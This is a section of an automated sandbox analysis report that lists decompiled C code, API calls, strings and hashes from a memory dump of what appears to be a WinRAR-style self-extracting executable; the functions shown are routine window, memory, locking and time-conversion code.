0x01018f68
0x01018f61
0x01018f72
0x01018f80
0x01018f89
0x01018f94
0x01018f99
0x01018fa5
0x01018fab
0x01018fab
0x00000000
0x00000000
0x00000000
0x00000000
0x01018ed5
0x01018ed5
0x01018ed5
0x01018ed8
0x01018ed8
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 01018F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 01018F59

Strings

utf-8"></head>, xrefs: 01018EBD
</html>, xrefs: 01018F0A
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 01018EB2
<html>, xrefs: 01018EA7, 01018EE0

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: 938a3fb99e279bbceef841607e51fada682d0d58429b3c899f33064f8162b07d
Instruction ID: 95edc9839cf170c45a58063c9dfb818cfe3c43e9d806785fcefee2ff60a90c1e
Opcode Fuzzy Hash: 938a3fb99e279bbceef841607e51fada682d0d58429b3c899f33064f8162b07d
Instruction Fuzzy Hash: D4314C315043227BE725AB349C41FEF7BADEFA1720F10451EFAC59A1C5EB6C960983A1

Uniqueness

Uniqueness Score: -1.00%

Function 01019635, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E01019635(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E01019344(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L010235CE( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E01027107(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0x1062108(0,  *0x1062154(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0x1062110( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0x1062118(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0x1062154(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0x106210c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E0101943C(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L010235CE(_t65);
							}
						}
					}
				}
				return _t43;
			}

0x0101963e
0x01019642
0x01019648
0x0101964b
0x0101964e
0x0101965a
0x01019663
0x01019668
0x0101966d
0x01019673
0x01019679
0x0101967d
0x01019675
0x01019675
0x01019675
0x01019683
0x0101968a
0x01019693
0x010196aa
0x010196b4
0x010196b9
0x010196b9
0x010196bf
0x010196cd
0x010196fa
0x01019700
0x01019707
0x01019741
0x01019743
0x01019748
0x00000000
0x01019751
0x01019709
0x0101970b
0x01019712
0x01019715
0x0101971c
0x01019721
0x01019725
0x0101972a
0x01019732
0x00000000
0x0101973e
0x01019725
0x01019715
0x0101970b
0x0101975d

APIs

ShowWindow.USER32(?,00000000), ref: 0101964E
GetWindowRect.USER32(?,00000000), ref: 01019693
ShowWindow.USER32(?,00000005,00000000), ref: 0101972A
SetWindowTextW.USER32(?,00000000), ref: 01019732
ShowWindow.USER32(00000000,00000005), ref: 01019748

Strings

RarHtmlClassName, xrefs: 010196F4

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: b670643d653a702e04250cd74ff70b7802078ab05b75b0d8cfd63e23d9216648
Instruction ID: 6c7771505ba40d4f6d1f12ada9a625270a32ac3275052744c026e3eba1022c12
Opcode Fuzzy Hash: b670643d653a702e04250cd74ff70b7802078ab05b75b0d8cfd63e23d9216648
Instruction Fuzzy Hash: 6B310E31008310EFDB619F68DC48B6BBFA8FF48704F014599FE89AA16ACB39D400CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0102BFB5, Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0102BFB5(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E0102BF79(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1033974
					E0102BF79(_t2, 7);
					_t3 = _t45 + 0x38; // 0x1033990
					E0102BF79(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x10339c0
					E0102BF79(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x10339f0
					E0102BF79(_t5, 2);
					_t6 = _t45 + 0xa0; // 0x65004d
					E010284DE( *_t6);
					_t7 = _t45 + 0xa4; // 0x6f006d
					E010284DE( *_t7);
					_t8 = _t45 + 0xa8; // 0x790072
					E010284DE( *_t8);
					_t9 = _t45 + 0xb4; // 0x1033a0c
					E0102BF79(_t9, 7);
					_t10 = _t45 + 0xd0; // 0x1033a28
					E0102BF79(_t10, 7);
					_t11 = _t45 + 0xec; // 0x1033a44
					E0102BF79(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x1033a74
					E0102BF79(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x1033aa4
					E0102BF79(_t13, 2);
					_t14 = _t45 + 0x154; // 0x76f988da
					E010284DE( *_t14);
					_t15 = _t45 + 0x158; // 0x983e5152
					E010284DE( *_t15);
					_t16 = _t45 + 0x15c; // 0xa831c66d
					E010284DE( *_t16);
					_t17 = _t45 + 0x160; // 0xb00327c8
					return E010284DE( *_t17);
				}
				return _t18;
			}

0x0102bfbb
0x0102bfc0
0x0102bfc9
0x0102bfce
0x0102bfd4
0x0102bfd9
0x0102bfdf
0x0102bfe4
0x0102bfea
0x0102bfef
0x0102bff8
0x0102bffd
0x0102c003
0x0102c008
0x0102c00e
0x0102c013
0x0102c019
0x0102c01e
0x0102c027
0x0102c02c
0x0102c035
0x0102c03d
0x0102c046
0x0102c04b
0x0102c054
0x0102c059
0x0102c062
0x0102c067
0x0102c06d
0x0102c072
0x0102c078
0x0102c07d
0x0102c083
0x0102c088
0x00000000
0x0102c093
0x0102c098

APIs

Part of subcall function 0102BF79: _free.LIBCMT ref: 0102BFA2

_free.LIBCMT ref: 0102C003

Part of subcall function 010284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0102BFA7,01033958,00000000,01033958,00000000,?,0102BFCE,01033958,00000007,01033958,?,0102C3CB,01033958), ref: 010284F4
Part of subcall function 010284DE: GetLastError.KERNEL32(01033958,?,0102BFA7,01033958,00000000,01033958,00000000,?,0102BFCE,01033958,00000007,01033958,?,0102C3CB,01033958,01033958), ref: 01028506

_free.LIBCMT ref: 0102C00E
_free.LIBCMT ref: 0102C019
_free.LIBCMT ref: 0102C06D
_free.LIBCMT ref: 0102C078
_free.LIBCMT ref: 0102C083
_free.LIBCMT ref: 0102C08E

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: 52b000aea4aa7245e5e9894f94788abeacd4ca81b28fac0c29d4f25cd2ccb940
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: 4E114C71980B29FAD660BBB0CC05FCBF7DDAF18700F40C859E7D9A6450DE66F9089A90

Uniqueness

Uniqueness Score: -1.00%

Function 010220CA, Relevance: 10.6, APIs: 7, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E010220CA(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x103e680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E0102330E(__eflags,  *0x103e680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E01023348(__eflags,  *0x103e680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E010285A9(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E01023348(__eflags,  *0x103e680, 0);
								} else {
									__eflags = E01023348(__eflags,  *0x103e680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E010284DE(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x010220d1
0x010220e4
0x010220eb
0x010220ee
0x010220f1
0x0102210a
0x0102210a
0x010220f3
0x010220f3
0x010220f5
0x010220ff
0x01022105
0x01022106
0x01022108
0x01022118
0x0102211c
0x0102211e
0x01022132
0x01022132
0x0102213b
0x01022120
0x0102212e
0x01022130
0x01022144
0x01022146
0x01022146
0x00000000
0x00000000
0x00000000
0x01022130
0x01022149
0x00000000
0x00000000
0x00000000
0x01022108
0x010220f5
0x01022151
0x0102215b
0x010220d3
0x010220d5
0x010220d5

APIs

GetLastError.KERNEL32(?,?,010220C1,0101FB12), ref: 010220D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 010220E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 010220FF
SetLastError.KERNEL32(00000000,?,010220C1,0101FB12), ref: 01022151

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 432ef8d6a378ef1017f1aa90beeda7a059659f7130a19f40c7644a2bc20c0b69
Instruction ID: 169fa964776820fb816987e7b2665dfc335ec6028e49cd45a704b6707a66f6a7
Opcode Fuzzy Hash: 432ef8d6a378ef1017f1aa90beeda7a059659f7130a19f40c7644a2bc20c0b69
Instruction Fuzzy Hash: 0801FC361097326EB7B92AF9BC84B5A2BCCFB29670731076AF7D0591D4EF5B4801A244

Uniqueness

Uniqueness Score: -1.00%

Function 0101DC9A, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E0101DC9A() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0x1060cd0;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0x1060cd4 = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0x1060cd8 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}

0x0101dc9a
0x0101dca5
0x0101dcad
0x0101dcbf
0x0101dcc3
0x0101dccf
0x0101dcd7
0x00000000
0x0101dcd9
0x0101dcdf
0x0101dce4
0x0101dcec
0x00000000
0x0101dcee
0x0101dcee
0x0101dcee
0x0101dcec
0x0101dcc5
0x0101dcc5
0x0101dcc5
0x0101dcc5
0x0101dcfc
0x0101dd02
0x0101dd0a
0x0101dd10
0x00000000
0x00000000
0x00000000
0x0101dd0c
0x0101dd0c
0x0101dd0c
0x0101dd0c
0x0101dd14
0x0101dcaf
0x0101dcb2
0x0101dcb2
0x0101dca7
0x0101dcaa
0x0101dcaa

Strings

AcquireSRWLockExclusive, xrefs: 0101DCC9
KERNEL32.DLL, xrefs: 0101DCB4
ReleaseSRWLockExclusive, xrefs: 0101DCD9

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: 43295db78d86a90fbda7a1ee95f818a9808789cb6f4596d3e753f1bc8c2d61c6
Instruction ID: 312861e2f8ed469793e5024ba580d2bef4cc8c5b70a4aeffe0e39198fb45bcd9
Opcode Fuzzy Hash: 43295db78d86a90fbda7a1ee95f818a9808789cb6f4596d3e753f1bc8c2d61c6
Instruction Fuzzy Hash: E801D1717813275B4FB16EED58996A667D8AB8112631008BEF6C1DB20CEA9EC04187A0

Uniqueness

Uniqueness Score: -1.00%

Function 01010CBE, Relevance: 9.1, APIs: 6, Instructions: 94
timeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E01010CBE(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				struct _SYSTEMTIME _v44;
				struct _SYSTEMTIME _v60;
				struct _SYSTEMTIME _v76;
				intOrPtr _t47;
				intOrPtr _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v44.wYear =  *_t66;
				_t3 = _t66 + 4; // 0x8b550004
				_v44.wMonth =  *_t3;
				_t5 = _t66 + 8; // 0x48ec83ec
				_v44.wDay =  *_t5;
				_t7 = _t66 + 0xc; // 0x85d8b53
				_v44.wHour =  *_t7;
				_t9 = _t66 + 0x10; // 0xf18b5756
				_v44.wMinute =  *_t9;
				_t11 = _t66 + 0x14; // 0x66038b66
				_v44.wSecond =  *_t11;
				_v44.wMilliseconds = 0;
				_v44.wDayOfWeek = 0;
				if(SystemTimeToFileTime( &_v44,  &_v20) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E0100ACF5() >= 0x600) {
						FileTimeToSystemTime( &_v20,  &_v60);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v60,  &_v76);
						SystemTimeToFileTime( &_v76,  &_v12);
						SystemTimeToFileTime( &_v60,  &_v28);
						_t61 = _v12.dwHighDateTime + _v20.dwHighDateTime;
						asm("sbb eax, [ebp-0x14]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v28.dwLowDateTime + _v12.dwLowDateTime + _v20.dwLowDateTime;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v20,  &_v12);
						_t61 = _v12.dwHighDateTime;
						_t72 = _v12.dwLowDateTime;
					}
					 *_t76 = E0101E7E0(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t36 = _t66 + 0x18; // 0x66d84589
				_t47 =  *_t36;
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}

0x01010cbe
0x01010cc5
0x01010cca
0x01010ccf
0x01010cd3
0x01010cd7
0x01010cdb
0x01010cdf
0x01010ce3
0x01010ce7
0x01010ceb
0x01010cef
0x01010cf3
0x01010cf7
0x01010cfd
0x01010d01
0x01010d15
0x01010da7
0x01010da9
0x01010d1b
0x01010d27
0x01010d47
0x01010d56
0x01010d64
0x01010d72
0x01010d7d
0x01010d82
0x01010d88
0x01010d8d
0x01010d8f
0x01010d92
0x01010d29
0x01010d31
0x01010d37
0x01010d3a
0x01010d3a
0x01010d9e
0x01010da0
0x01010da0
0x01010dac
0x01010dac
0x01010daf
0x01010db1
0x01010dba

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 01010D0D

Part of subcall function 0100ACF5: GetVersionExW.KERNEL32(?), ref: 0100AD1A

LocalFileTimeToFileTime.KERNEL32(?,01010CB8), ref: 01010D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 01010D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 01010D56
SystemTimeToFileTime.KERNEL32(?,01010CB8), ref: 01010D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 01010D72

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 8c439690d431d749f4f11003f32ad1e9dae4bb657a5ba7d8f5a78a53fdcd2859
Instruction ID: b8efb8e0e824aa42b22cdaf65977ec34aa8bf500a203fd11d52ffdca201a5c44
Opcode Fuzzy Hash: 8c439690d431d749f4f11003f32ad1e9dae4bb657a5ba7d8f5a78a53fdcd2859
Instruction Fuzzy Hash: 8C31E87A90020AEBCB10DFE4C8859EFFBBCFF58700B04455AE995E7204E734A585CB64

Uniqueness

Uniqueness Score: -1.00%

Function 010191B0, Relevance: 9.1, APIs: 6, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E010191B0(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t17;
				signed int _t23;
				void* _t26;
				signed int _t32;
				signed int* _t36;

				_t36 = _a12;
				if(_t36 != 0) {
					_t34 = _a8;
					_t26 = 0x10;
					if(E0101FDFA(_a8, 0x10353ac, _t26) == 0) {
						L13:
						_t32 = _a4;
						 *_t36 = _t32;
						L14:
						 *0x1033260(_t32);
						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 4))))();
						_t17 = 0;
						L16:
						return _t17;
					}
					if(E0101FDFA(_t34, 0x10353ec, _t26) != 0) {
						if(E0101FDFA(_t34, 0x10353cc, _t26) != 0) {
							if(E0101FDFA(_t34, 0x103539c, _t26) != 0) {
								if(E0101FDFA(_t34, 0x103543c, _t26) != 0) {
									if(E0101FDFA(_t34, 0x103538c, _t26) != 0) {
										 *_t36 =  *_t36 & 0x00000000;
										_t17 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t32 = _a4;
								_t23 = _t32 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t36 =  ~_t32 & _t23;
								goto L14;
							}
							_t32 = _a4;
							_t23 = _t32 + 0xc;
							goto L11;
						}
						_t32 = _a4;
						_t23 = _t32 + 8;
						goto L11;
					}
					_t32 = _a4;
					_t23 = _t32 + 4;
					goto L11;
				}
				return 0x80004003;
			}

0x010191b4
0x010191b9
0x010191c7
0x010191cc
0x010191de
0x0101926d
0x0101926d
0x01019270
0x01019272
0x0101927a
0x01019280
0x01019282
0x0101928e
0x00000000
0x0101928f
0x010191f5
0x01019210
0x0101922b
0x01019246
0x0101926b
0x01019286
0x01019289
0x00000000
0x01019289
0x00000000
0x0101926b
0x01019248
0x0101924b
0x0101924e
0x01019252
0x01019256
0x00000000
0x01019256
0x0101922d
0x01019230
0x00000000
0x01019230
0x01019212
0x01019215
0x00000000
0x01019215
0x010191f7
0x010191fa
0x00000000
0x010191fa
0x00000000

APIs

_memcmp.LIBVCRUNTIME ref: 010191D4
_memcmp.LIBVCRUNTIME ref: 010191EB

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f52f86bd362fa0bf80af63411a08c9b79b01859e2095a497ac2b0212396ff267
Instruction ID: 97489f5ce2696ff27fea60a1b4bd30b6b58cd490ae02d531442cf3acbcc0f1fd
Opcode Fuzzy Hash: f52f86bd362fa0bf80af63411a08c9b79b01859e2095a497ac2b0212396ff267
Instruction Fuzzy Hash: F021A47160420FABD705AE15CC91EBF77EDEB9064CF10C128FC899B219E278ED468691

Uniqueness

Uniqueness Score: -1.00%

Function 01028FA5, Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E01028FA5(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x103e6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E010285A9(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E0102A671(_t25, _t36, __eflags,  *0x103e6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E01028E16(_t25, _t31, 0x1061290);
							E010284DE(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E010284DE();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E01028566(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x103e6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E010285A9(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E0102A671(_t27, _t37, __eflags,  *0x103e6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E01028E16(_t27, _t32, 0x1061290);
									E010284DE(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E010284DE();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0102A61B(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0102A61B(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x01028fa5
0x01028fa5
0x01028fa5
0x01028faf
0x01028fb1
0x01028fb6
0x01028fb9
0x01028fc7
0x01028fce
0x01028fd3
0x01028fd6
0x01028fd9
0x01028feb
0x01028ff0
0x01028ff2
0x01028ffd
0x01029004
0x01029009
0x0102900c
0x0102900e
0x00000000
0x00000000
0x00000000
0x00000000
0x01028ff4
0x01028ff4
0x00000000
0x01028ff4
0x01028fdb
0x01028fdb
0x01028fdc
0x01028fdc
